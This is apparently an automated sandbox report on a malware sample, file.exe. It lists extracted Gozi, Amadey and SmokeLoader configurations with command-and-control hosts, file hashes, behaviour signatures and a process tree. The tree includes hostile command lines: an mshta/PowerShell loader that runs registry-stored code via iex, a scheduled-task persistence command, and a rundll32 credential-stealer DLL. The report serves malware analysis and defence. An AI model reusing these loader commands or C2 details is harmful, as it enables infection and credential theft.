Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/12/2022, 12:01

General

  • Target

    file.exe

  • Size

    229KB

  • MD5

    96aa7e5cd62710829a1f3b17922fc117

  • SHA1

    edd95f2c58e1c5dde12aff974e6d42ea7469695b

  • SHA256

    d16704455547e98721bdc8ebc9a233376b24f086469b707fccf10da54eb77744

  • SHA512

    e0d619d48fde2af62fef20ec4ff65e0d24852150ca560d6461a851843f775f516fa8cb63d32ec6ef2556aa8d53a3c78c4da529a91b67a9ce59169c377c162f74

  • SSDEEP

    3072:kXRcBLv/M7j5vuvW1YPG8vqGqSMiustPtYKs/xAI99:G6LvE7N1WlcLQ1YDZ

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

22500

C2

confisg.edge.skype.com

http://

s28bxcw.xyz

config.edgse.skype.com

http://89.43.107.7

Attributes
  • base_path

    /recycle/

  • build

    250249

  • exe_type

    loader

  • extension

    .alo

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

amadey

Version

3.63

C2

62.204.41.165/g8sjnd3xe/index.php

Extracted

Family

gozi

Botnet

22500

C2

confisg.edge.skype.com

http://5icvzwz.xyz

http://185.14.45.80

Attributes
  • base_path

    /recycle/

  • build

    250249

  • exe_type

    worker

  • extension

    .alo

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Amadey credential stealer module 2 IoCs
  • Detects Smokeloader packer 1 IoCs
  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3436
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:3104
      • C:\Windows\system32\regsvr32.exe
        regsvr32 /s C:\Users\Admin\AppData\Local\Temp\DD36.dll
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4260
        • C:\Windows\SysWOW64\regsvr32.exe
          /s C:\Users\Admin\AppData\Local\Temp\DD36.dll
          3⤵
          • Loads dropped DLL
          PID:3760
      • C:\Users\Admin\AppData\Local\Temp\DF4A.exe
        C:\Users\Admin\AppData\Local\Temp\DF4A.exe
        2⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3896
        • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
          "C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"
          3⤵
          • Executes dropped EXE
          PID:4564
      • C:\Users\Admin\AppData\Local\Temp\DFF7.exe
        C:\Users\Admin\AppData\Local\Temp\DFF7.exe
        2⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4944
        • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
          "C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"
          3⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4784
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe" /F
            4⤵
            • Creates scheduled task(s)
            PID:4644
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Accesses Microsoft Outlook profiles
            • outlook_win_path
            PID:4120
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Enkw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Enkw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\7088CE6E-0F81-227B-19A4-B3765D18970A\\\MaskCollision'));if(!window.flag)close()</script>"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fxsbvfxfwx -value gp; new-alias -name xpexgpwhwd -value iex; xpexgpwhwd ([System.Text.Encoding]::ASCII.GetString((fxsbvfxfwx "HKCU:Software\AppDataLow\Software\Microsoft\7088CE6E-0F81-227B-19A4-B3765D18970A").TextValue))
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1000
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\anlvrfou\anlvrfou.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4416
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA15C.tmp" "c:\Users\Admin\AppData\Local\Temp\anlvrfou\CSCC0C74C54BDBF44E9B430B7331D86AE9B.TMP"
              5⤵
                PID:532
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lag1hfin\lag1hfin.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3968
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA207.tmp" "c:\Users\Admin\AppData\Local\Temp\lag1hfin\CSCCC7BA64E4C6743BFB47538CD925B52A.TMP"
                5⤵
                  PID:3976
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\DD36.dll"
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:4812
            • C:\Windows\system32\PING.EXE
              ping localhost -n 5
              3⤵
              • Runs ping.exe
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              PID:3528
          • C:\Windows\syswow64\cmd.exe
            "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
            2⤵
              PID:328
          • C:\Windows\System32\RuntimeBroker.exe
            C:\Windows\System32\RuntimeBroker.exe -Embedding
            1⤵
              PID:3696
            • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
              C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
              1⤵
              • Executes dropped EXE
              PID:1192
            • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
              C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
              1⤵
              • Executes dropped EXE
              PID:4976

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\DD36.dll

              Filesize

              584KB

              MD5

              71bb495869bfff145090bdb878800130

              SHA1

              5d1e298129bc9c8bf6d1b5d3d9f321a8858e9ab5

              SHA256

              9475ff9c5e05af184d06a10b33225f74e89cb941495a82bf4038df98169a432f

              SHA512

              ef22db3f32bf5cd34bc69245c41e9eea8bff7b61c8062631a0817744155e802c7caf4f2711ff653572a15903fc07b1af283cd2289d75f268c22eec14ae173c73

            • C:\Users\Admin\AppData\Local\Temp\DD36.dll

              Filesize

              584KB

              MD5

              71bb495869bfff145090bdb878800130

              SHA1

              5d1e298129bc9c8bf6d1b5d3d9f321a8858e9ab5

              SHA256

              9475ff9c5e05af184d06a10b33225f74e89cb941495a82bf4038df98169a432f

              SHA512

              ef22db3f32bf5cd34bc69245c41e9eea8bff7b61c8062631a0817744155e802c7caf4f2711ff653572a15903fc07b1af283cd2289d75f268c22eec14ae173c73

            • C:\Users\Admin\AppData\Local\Temp\DF4A.exe

              Filesize

              235KB

              MD5

              1d641e8215a82151e8925673bfb171a1

              SHA1

              12885d250304d50920b79a00524250eaac5a7741

              SHA256

              5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445

              SHA512

              b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

            • C:\Users\Admin\AppData\Local\Temp\DF4A.exe

              Filesize

              235KB

              MD5

              1d641e8215a82151e8925673bfb171a1

              SHA1

              12885d250304d50920b79a00524250eaac5a7741

              SHA256

              5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445

              SHA512

              b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

            • C:\Users\Admin\AppData\Local\Temp\DFF7.exe

              Filesize

              235KB

              MD5

              1d641e8215a82151e8925673bfb171a1

              SHA1

              12885d250304d50920b79a00524250eaac5a7741

              SHA256

              5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445

              SHA512

              b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

            • C:\Users\Admin\AppData\Local\Temp\DFF7.exe

              Filesize

              235KB

              MD5

              1d641e8215a82151e8925673bfb171a1

              SHA1

              12885d250304d50920b79a00524250eaac5a7741

              SHA256

              5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445

              SHA512

              b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

            • C:\Users\Admin\AppData\Local\Temp\RESA15C.tmp

              Filesize

              1KB

              MD5

              3acebf6571b30a0efbb8da48477038fa

              SHA1

              73fad39fbd0a02c61fdc1fd652a600efbbfae103

              SHA256

              2632119439dcd985e36efde3e4c072de78ea15026aada8c1128d8b844eae2a28

              SHA512

              216b2159ed4aa76edc3304890f5a1118b866c729ecd7de5473cb2ff10d7c7406da4afb01fac332f8b41918daa778c1998450540071813ab3dbc5d64aaecc6f45

            • C:\Users\Admin\AppData\Local\Temp\RESA207.tmp

              Filesize

              1KB

              MD5

              dd04aece8c51798c9bed56b463a89220

              SHA1

              4343b1c7e56be8b2e42ba43ffd76728e30a8a822

              SHA256

              d48dd6b0511d2f2c683c0ae40e3cacd27495225c391cce4e64bb400ae1549acd

              SHA512

              b41071e8f4218dd7fcef407ca024653b8dd0c3659b4de4357f61d9aeb5eef17282ecea78f36d8230638652be92227d47f762900995c2c811da0235be35ca835f

            • C:\Users\Admin\AppData\Local\Temp\anlvrfou\anlvrfou.dll

              Filesize

              3KB

              MD5

              8e3f28ef3a22b18d0bb57316fc8f7545

              SHA1

              0563e00e9c9ab3ce9c6e2777afd2eab9fc556693

              SHA256

              667e58870c5c157c9ea2a7ca48f9dffa22e577fa3b9fcec57319c970024844e5

              SHA512

              49941368a216d73123bdebf89202810bbce0426015f69c1ca5706cf717909227ed760a92a78de908fd0fa532ac89009996c0ec463a6cfb6f47cd9102a6092176

            • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe

              Filesize

              235KB

              MD5

              1d641e8215a82151e8925673bfb171a1

              SHA1

              12885d250304d50920b79a00524250eaac5a7741

              SHA256

              5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445

              SHA512

              b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

            • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe

              Filesize

              235KB

              MD5

              1d641e8215a82151e8925673bfb171a1

              SHA1

              12885d250304d50920b79a00524250eaac5a7741

              SHA256

              5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445

              SHA512

              b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

            • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe

              Filesize

              235KB

              MD5

              1d641e8215a82151e8925673bfb171a1

              SHA1

              12885d250304d50920b79a00524250eaac5a7741

              SHA256

              5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445

              SHA512

              b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

            • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe

              Filesize

              235KB

              MD5

              1d641e8215a82151e8925673bfb171a1

              SHA1

              12885d250304d50920b79a00524250eaac5a7741

              SHA256

              5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445

              SHA512

              b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

            • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe

              Filesize

              235KB

              MD5

              1d641e8215a82151e8925673bfb171a1

              SHA1

              12885d250304d50920b79a00524250eaac5a7741

              SHA256

              5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445

              SHA512

              b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

            • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe

              Filesize

              235KB

              MD5

              1d641e8215a82151e8925673bfb171a1

              SHA1

              12885d250304d50920b79a00524250eaac5a7741

              SHA256

              5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445

              SHA512

              b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

            • C:\Users\Admin\AppData\Local\Temp\lag1hfin\lag1hfin.dll

              Filesize

              3KB

              MD5

              e5a00a091100652d4e82f691cd5b9536

              SHA1

              41ec84d32e0efd0667f7fce32fa470f21485b4d3

              SHA256

              71a26f2bd7c5c2bd3dd323cc3c2ffcf26b63607af9418da05df7ffbcfdc5dbb3

              SHA512

              d11a7609371f3a8ef58cdc8964bee5a2f7c72d26e67504d7509e7293be19f1f5bdb4b0c7e33450c418a254a65634de396845f486a3345c0e39e4e1ec3c42583f

            • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

              Filesize

              126KB

              MD5

              70134bf4d1cd851b382b2930a2e182ea

              SHA1

              8454d476c0d36564792b49be546593af3eab29f4

              SHA256

              5e4cb0cc51202cef27c4f5da63362ceee8c29a03e61ac19efda3c137b657d9ef

              SHA512

              1af07ab22359f69fe32e359883f7d31f3068582ba0eddcb1faf6bf7686f32f51e36cdf645ac9dd727a4bf9b8c390245d7e71faf17c1a18ff3054c55f19c770bd

            • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

              Filesize

              126KB

              MD5

              70134bf4d1cd851b382b2930a2e182ea

              SHA1

              8454d476c0d36564792b49be546593af3eab29f4

              SHA256

              5e4cb0cc51202cef27c4f5da63362ceee8c29a03e61ac19efda3c137b657d9ef

              SHA512

              1af07ab22359f69fe32e359883f7d31f3068582ba0eddcb1faf6bf7686f32f51e36cdf645ac9dd727a4bf9b8c390245d7e71faf17c1a18ff3054c55f19c770bd

            • \??\c:\Users\Admin\AppData\Local\Temp\anlvrfou\CSCC0C74C54BDBF44E9B430B7331D86AE9B.TMP

              Filesize

              652B

              MD5

              2854389483877c6b3c939c9591307697

              SHA1

              7922d83d60ce84a1f8d56c2974d70f4ac5325f12

              SHA256

              11371b60c998a14799a3d1bc6599f99e3aa2f91255eea4c9726493f2435ab739

              SHA512

              27a4cbd3ee15df1770c2527c6e675bb9ab38587de41ce971bcaee6946d9cfc13e37f1344124e4063c60c75a9d0b3f076ea6fe2f916942c474754b365176854d0

            • \??\c:\Users\Admin\AppData\Local\Temp\anlvrfou\anlvrfou.0.cs

              Filesize

              408B

              MD5

              f58cc7462a9dc35fa5ccf9d605d846f9

              SHA1

              c864bbe18005d5c8e0c95cf71cf82afc1f2222a0

              SHA256

              adea20d896d1565230e0799ac1e5e14719062ce0e00080c412222a98bddcadcb

              SHA512

              d13c80ea909a9f6ebedeaa8d4e73cfd01d3d8b465b02b1f5663f22ef189e9f0b5329b60fcb6c888334c370c69ca92dee1a9b5f0b0262377132e4a6822970e6f1

            • \??\c:\Users\Admin\AppData\Local\Temp\anlvrfou\anlvrfou.cmdline

              Filesize

              369B

              MD5

              4e38725de3957c26eec00b3a2f51bfac

              SHA1

              f7849021d58aec6e675b67cb9c3c672f462306b3

              SHA256

              7298d26d510eedac597c670b4fdbc54556bf69f69b2e30997022b7e1d906b142

              SHA512

              9de0b0b5b1d2aa0eba395b772fc36de517fec212107248301bc4ab4e6a5ebe38c8fb4ea22ead434616b4653f19b3482cec572b70f77c05e74cdf1bc863a6aa1f

            • \??\c:\Users\Admin\AppData\Local\Temp\lag1hfin\CSCCC7BA64E4C6743BFB47538CD925B52A.TMP

              Filesize

              652B

              MD5

              cf994197fe55bc349bc6e0cc85fb182d

              SHA1

              795a49c83dc340f1675c71ffb1f5d71efe6b9e2b

              SHA256

              38f1d2c42291f49df649c76539839a797ab99db458aff3efba66fec56b37101c

              SHA512

              10af0dbda2a96e45af015b6d84e0c56de71880b5c3f83d379876c3b75ab956e71cfaaab7d9b6755fbfb0ee05e708f3adcab6bce05b0d1de3e568bf5e72b8de3d

            • \??\c:\Users\Admin\AppData\Local\Temp\lag1hfin\lag1hfin.0.cs

              Filesize

              408B

              MD5

              0a5374e53f44ac8b609707a893f72b21

              SHA1

              83ec00746897bcacf4c5a049b7e090d057f62cf9

              SHA256

              0388c68b7b848cb08941edbfe4bcaa8f6df3c461df1c9a7542103e279f64c5f9

              SHA512

              ce62cb7723a6fcb5448c7c096c293a503662888f75f1a92ea8a9a15955e82ad6f7773829604633782f0e3e8d5bb07286bc281a94d2f99f0f57d4cea4e873cdd4

            • \??\c:\Users\Admin\AppData\Local\Temp\lag1hfin\lag1hfin.cmdline

              Filesize

              369B

              MD5

              dff1d36d9cd0c96dbedcfa54e0dbd203

              SHA1

              6b8f427088bbc096374575e44bf877be3c9a6dd2

              SHA256

              96632ca187e24344a9b5fef2bff6187f34b9be25b4cc2a8ed5fb6ae13d732055

              SHA512

              a8bdd760730ff83fc1fdad2864bd377f53d68c3ae7a3f76b110bce638ba9c971fc32eca1373e341d1c87e183a8ba15d755528e9fdc6f95c4219a1a3c6095765a

            • memory/328-195-0x00000000010D0000-0x0000000001166000-memory.dmp

              Filesize

              600KB

            • memory/328-194-0x0000000000936B20-0x0000000000936B24-memory.dmp

              Filesize

              4B

            • memory/1000-186-0x00000266BB630000-0x00000266BB66C000-memory.dmp

              Filesize

              240KB

            • memory/1000-168-0x00000266BA9C0000-0x00000266BA9E2000-memory.dmp

              Filesize

              136KB

            • memory/1000-169-0x00007FF851F40000-0x00007FF852A01000-memory.dmp

              Filesize

              10.8MB

            • memory/1000-185-0x00007FF851F40000-0x00007FF852A01000-memory.dmp

              Filesize

              10.8MB

            • memory/2640-190-0x0000000008790000-0x0000000008832000-memory.dmp

              Filesize

              648KB

            • memory/3104-135-0x0000000000400000-0x000000000045E000-memory.dmp

              Filesize

              376KB

            • memory/3104-136-0x0000000000400000-0x000000000045E000-memory.dmp

              Filesize

              376KB

            • memory/3104-134-0x0000000002190000-0x0000000002199000-memory.dmp

              Filesize

              36KB

            • memory/3104-133-0x0000000000460000-0x0000000000560000-memory.dmp

              Filesize

              1024KB

            • memory/3436-188-0x00000230F1270000-0x00000230F1312000-memory.dmp

              Filesize

              648KB

            • memory/3528-192-0x000001121E180000-0x000001121E222000-memory.dmp

              Filesize

              648KB

            • memory/3696-189-0x000001A2AD130000-0x000001A2AD1D2000-memory.dmp

              Filesize

              648KB

            • memory/3760-157-0x00000000015D0000-0x00000000015DD000-memory.dmp

              Filesize

              52KB

            • memory/3760-155-0x0000000001310000-0x0000000001316000-memory.dmp

              Filesize

              24KB

            • memory/3760-141-0x0000000000400000-0x0000000000495000-memory.dmp

              Filesize

              596KB

            • memory/4812-191-0x00000237BEF30000-0x00000237BEFD2000-memory.dmp

              Filesize

              648KB